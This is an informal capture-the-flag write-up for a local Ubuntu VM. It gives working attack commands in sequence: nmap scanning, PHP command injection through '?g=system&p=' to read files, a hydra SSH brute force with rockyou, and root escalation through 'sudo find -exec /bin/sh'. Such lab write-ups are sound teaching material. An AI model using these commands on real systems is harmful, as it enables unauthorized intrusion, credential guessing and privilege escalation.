ok wlc everyone i hope you find this writeup helpful
soo lets go hunting some flags 👻
in the first the give us virtual machine to be this challenge locale
like this
but here we have (Ubuntu) Server
lets start expline from 0
first we have .ova
.ova = Open Virtual Appliance (Virtual Machine Disk Image)
soo just drop it in vmware
and but any name you want then just run it
when you run it
ok leave him lets start real work ;)
now we have 2 machine work
our machine kali and the victim shuld be this (Ubuntu) Server
both of them in same netowrk that why i say LOCALE
soo to know the ip for victim we well descover our network
to know who with us
you can $netdiscover
or $nmap -sn subnet
or what i do nmap for full range
first let get the ip for network = $ ip a
NOTE !!!
There are many ways to solve it, so do what you want
soo here our ip
192.xxx.xxx.164/24
to scan full range replacy 164 with 0
i well use nmap
nmap 192.xxx.xxx.0/24
you well find like
192.xxx.xxx.0 &&192.xxx.xxx.1 && 192.xxx.xxx.2 && 192.xxx.xxx.3
in our case i find the ip and the are 2 ports open
soo lets get more Details
nmap -sV -A 192.xxx.xxx.3 -p 80 and 22
you can go search for exploit for them but in this case i well go to http check him
the are little code php
the are parametr g,p,h
lets move this to burp = i find command inj
/?g=system&p=“here you command ”
soo from here we can do revers shell and done
but the are another way lets play
ok we have here database.php and the index.php
lets see what inside database.php
/?g=system&p=cat%20database.php
ok this is the second solve we get username
or you can in same web show_source
?g=show_source&p=database.php
anyway we get the user its is = auditor
little trick you can do = ?g=system&p=ls%20/home to get the user
soo now we have user name
we can brute force ssh by this user
hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -t 4 ssh
soo we get username and passwd forr ssh
soo we get user flag Done lets get root
now we need privilege escalation
first lets check sudo version
no exploit for him now
lets see what we can do like root
ok nice we can run find like root
to get the root i well use
sudo find . -exec /bin/sh \; -quit
soo we get the root lets get the flag
